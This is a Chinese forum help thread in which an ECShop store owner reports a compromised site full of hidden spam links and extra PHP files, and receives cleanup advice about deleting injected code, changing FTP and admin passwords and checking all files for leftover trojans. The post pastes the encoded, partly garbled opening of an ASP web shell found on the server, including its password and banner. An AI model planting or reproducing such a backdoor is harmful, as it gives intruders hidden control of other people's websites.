v2.7.0版本被挂木马求助

2016-07-07 15:26 来源:www.chinab4c.com 作者:ecshop专家

今天发现网店首页给挂了很多黑连,网站程序里也多出挺多php文件
十几天前就发现IP比之前少了点,而网站后台的今日访问和在线人数又多了很多。
谁能忙帮看一下吗,谢谢了
看了一下那些php文件里很多都是这些开头的,接着下面还有一大串乱七八糟的。


<%@ LANGUAGE = VBScript.Encode %>
<%
UserPass="zhu"
mName="F.S.T 联盟交流群内部版!!!别外传噢!!!"
Copyright="注:请勿用于非法用途,否则后果作者概不负责"
[email=#@~^AAUAAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n]#@~^AAUAAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n[/email] ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XO@#@&?;A,?46S2I"[email=c#@#@&P,(WPADMPPC3H@#@&~P,~IM?E@!(D@*@!C,t.+6xELC7lkmDbwDltb/OWMX]c#@#@&P,(WPADMPPC3H@#@&~P,~IM?E@!(D@*@!C,t.+6xELC7lkmDbwDltb/OWMX[/email] [email=8mm3vbB@*@!4M@*]8mm3vbB@*@!4M@*'x(/aiEP'~AD.R93/;D(KDkrH~LPE@!JC@*@!8M@*r@#@&,P,~+"D[/email] md2C]=I+kKr [email=?+cosEUt@#@&~PnU9Prs@#@&2gf~j!A@#@&d!4~DMdv?PM#@#@&d]?+cosEUt@#@&~PnU9Prs@#@&2gf~j!A@#@&d!4~DMdv?PM#@#@&d"+UKW[/email] /3RSI(O`?D]#@#@&+ [~?`A@#@&ojH/:k61,]+hlO4v?#@#@&,P.+a):tx"[email=+hSb12vd~r-E~r-wE*@#@&UN,sE]+hSb12vd~r-E~r-wE*@#@&UN,sE[/email] [email=^Oq}x@#@&WjU/DqGx,]IwCO4`/b@#@&P~IM3hbP4]^Oq}x@#@&WjU/DqGx,]IwCO4`/b@#@&P~IM3hbP4[/email]

回答:
有人帮帮忙吗

用批量字符替换器删除这些代码后,修改FTP密码,FTP密码要尽量复杂

谢谢 热心版主

他怎样能算我FTP密码的呢?

刚刚又来挂了一大堆暗连,我网站后台有两个帐号一个N久没登陆了 居然显示5月30号有人登陆过。
现在改了FTP跟网站后台密码,多出木马后门的文件也清了一下,不知道还会不会有问题。。。郁闷啊

又给挂了,疯了,谁帮帮忙吗

有个问题你可能没处理好,可能被上传了木马文件你没有删除,这样即使没有ftp权限一样能挂。一定要检查所有的文件,确定没有木马存在才行